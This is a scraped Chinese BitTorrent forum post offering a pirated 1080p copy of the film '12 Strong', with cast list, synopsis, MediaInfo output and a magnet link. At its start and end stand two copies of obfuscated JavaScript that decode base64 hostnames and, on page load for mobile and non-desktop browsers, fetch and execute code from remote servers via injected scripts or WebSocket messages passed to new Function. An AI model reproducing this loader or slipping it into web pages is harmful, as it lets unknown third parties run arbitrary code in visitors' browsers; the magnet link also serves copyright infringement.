12勇士[中文字幕].12.Strong.2018.1080p.BluRay.x265.10bit.DTS 10.69GB

版主小s 28天前 280

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 12勇士 / 12猛汉(台) / 12壮士(港) / 骑兵团 / 马背上的战士 / Horse Soldiers

◎片 名 12 Strong

◎年 代 2018

◎产 地 美国

◎类 别 剧情 / 动作 / 历史 / 战争

◎语 言 英语 / 俄语 / 西班牙语 / 乌兹别克语

◎上映日期 2018-01-19(美国)

◎IMDb链接 https://www.imdb.com/title/tt1413492/

◎豆瓣评分 6.8/10 (20358人评价)

◎豆瓣链接 https://movie.douban.com/subject/3660130/

◎片 长 130分钟

◎导 演 尼科莱·弗格西格 Nicolai Fuglsig (id:1386058)

◎编 剧 泰德·塔里 Ted Tally (id:1000753)

彼得·克莱格 Peter Craig (id:1041402)

道格·斯坦顿 Doug Stanton (id:1387540)

◎演 员 克里斯·海姆斯沃斯 Chris Hemsworth (id:1021959)

迈克尔·珊农 Michael Shannon (id:1144415)

迈克尔·佩纳 Michael Pe?a (id:1131634)

纳维德·内加班 Navid Negahban (id:1018227)

崔凡特·罗兹 Trevante Rhodes (id:1340760)

吉欧夫·斯图兹 Geoff Stults (id:1036382)

萨德·拉金比尔 Thad Luckinbill (id:1115291)

奥斯汀·赫伯特 Austin Hébert (id:1385506)

奥斯汀·斯托维尔 Austin Stowell (id:1317023)

本·奥图尔 Ben O'Toole (id:1349365)

肯尼斯·米勒 Kenneth Miller (id:1236878)

肯尼·谢尔德 Kenny Sheard (id:1387541)

杰克·凯西 Jack Kesy (id:1326422)

罗伯·里格尔 Rob Riggle (id:1044950)

威廉·菲克纳 William Fichtner (id:1036360)

阿希亚·曼达维 Arshia Mandavi (id:1387542)

埃尔莎·帕塔奇 Elsa Pataky (id:1010610)

玛丽·瓦根曼 Marie Wagenman (id:1387543)

劳伦·迈尔斯 Lauren Myers (id:1387544)

阿利森·金 Allison King (id:1383437)

莱斯·纳克里 Laith Nakli (id:1209787)

法希姆·法兹利 Fahim Fazli (id:1240093)

纽曼·阿卡 Numan Acar (id:1344727)

塞斯·艾德金斯 Seth Adkins (id:1041305)

泰勒·谢里丹 Taylor Sheridan (id:1340379)

维罗妮卡·迪亚兹·卡兰萨 Veronica Diaz Carranza (id:1392006)

洛内·巴尔菲 Lorne Balfe (id:1032847)

◎标 签 战争 / 美国 / 阿富汗战争 / 真实事件改编 / 反恐战争 / 反恐 / 2018 / 动作

◎简 介

本片根据真人真事改编,讲述2001年911事件后一支美国特种兵小分队被派往阿富汗山区执行任务。锤哥扮演“绿色贝雷帽小队”队长,他不得不离开自己的妻子Elsa去执 行任务,带着12人的小分队踏上了阿富汗征程,并说服了北方联盟将军来共同对付塔利班及基地组织。为配合阿富汗地形和攻敌战略,特种部队们驾着马匹化身骑兵队,在险恶的山区追击敌军,一连串生死交锋的激烈战争一触即发。

◎获奖情况 (共1项)

第17届美国视觉效果协会奖 (2019)

最佳电影辅助视觉效果(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 201632071797131588649189545054693846460 (0x97B0ECAADF1F5CF9F1A4719734F96DBC)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.7 GiB

  8. Duration : 2 h 9 min

  9. Overall bit rate : 11.8 Mb/s

  10. Movie name : 12.Strong

  11. Encoded date : UTC 2021-11-02 11:47:37

  12. Writing application : mkvmerge v51.0.0 ('I Wish') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 9 min

  21. Bit rate : 10.1 Mb/s

  22. Width : 1 920 pixels

  23. Height : 800 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.273

  31. Stream size : 9.13 GiB (85%)

  32. Writing library : x265 3.4+1-g07e3381df+31:[Windows][GCC 10.1.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings : rc=crf / crf=18.5000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=3 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. ID in the original source medium : 4352 (0x1100)

  39. Format : DTS

  40. Format/Info : Digital Theater Systems

  41. Codec ID : A_DTS

  42. Duration : 2 h 9 min

  43. Bit rate mode : Constant

  44. Bit rate : 1 509 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 24 bits

  50. Compression mode : Lossy

  51. Stream size : 1.37 GiB (13%)

  52. Language : English

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Text #1

  57. ID : 3

  58. ID in the original source medium : 4612 (0x1204)

  59. Format : PGS

  60. Muxing mode : zlib

  61. Codec ID : S_HDMV/PGS

  62. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration : 2 h 3 min

  64. Bit rate : 114 kb/s

  65. Count of elements : 8275

  66. Stream size : 101 MiB (1%)

  67. Title : chs&eng

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No

  71. Original source medium : Blu-ray


  72. Text #2

  73. ID : 4

  74. ID in the original source medium : 4613 (0x1205)

  75. Format : PGS

  76. Muxing mode : zlib

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 2 h 3 min

  80. Bit rate : 114 kb/s

  81. Count of elements : 8275

  82. Stream size : 101 MiB (1%)

  83. Title : cht&eng

  84. Language : Chinese

  85. Default : No

  86. Forced : No

  87. Original source medium : Blu-ray


  88. Text #3

  89. ID : 5

  90. ID in the original source medium : 4614 (0x1206)

  91. Format : PGS

  92. Muxing mode : zlib

  93. Codec ID : S_HDMV/PGS

  94. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration : 2 h 3 min

  96. Bit rate : 85.7 kb/s

  97. Count of elements : 8275

  98. Stream size : 76.0 MiB (1%)

  99. Title : chs

  100. Language : Chinese

  101. Default : No

  102. Forced : No

  103. Original source medium : Blu-ray


  104. Text #4

  105. ID : 6

  106. ID in the original source medium : 4615 (0x1207)

  107. Format : PGS

  108. Muxing mode : zlib

  109. Codec ID : S_HDMV/PGS

  110. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  111. Duration : 2 h 3 min

  112. Bit rate : 86.0 kb/s

  113. Count of elements : 8275

  114. Stream size : 76.2 MiB (1%)

  115. Title : cht

  116. Language : Chinese

  117. Default : No

  118. Forced : No

  119. Original source medium : Blu-ray


  120. Text #5

  121. ID : 7

  122. ID in the original source medium : 4608 (0x1200)

  123. Format : PGS

  124. Muxing mode : zlib

  125. Codec ID : S_HDMV/PGS

  126. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration : 2 h 8 min

  128. Bit rate : 36.7 kb/s

  129. Count of elements : 3436

  130. Stream size : 33.8 MiB (0%)

  131. Title : eng

  132. Language : English

  133. Default : No

  134. Forced : No

  135. Original source medium : Blu-ray


  136. Menu

  137. 00:00:00.000 : en:第 01 章

  138. 00:12:41.343 : en:第 02 章

  139. 00:21:53.729 : en:第 03 章

  140. 00:32:56.599 : en:第 04 章

  141. 00:44:03.807 : en:第 05 章

  142. 00:56:21.878 : en:第 06 章

  143. 01:10:04.867 : en:第 07 章

  144. 01:21:03.942 : en:第 08 章

  145. 01:27:28.826 : en:第 09 章

  146. 01:41:19.782 : en:第 10 章

  147. 01:50:16.276 : en:第 11 章

  148. 02:01:16.560 : en:第 12 章




复制代码


TAGS 动作 剧情 历史 战争

磁力链:
  • magnet:?xt=urn:btih:B1AC2E949BFB6D6271DF899331D0B1ACD69F1889

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};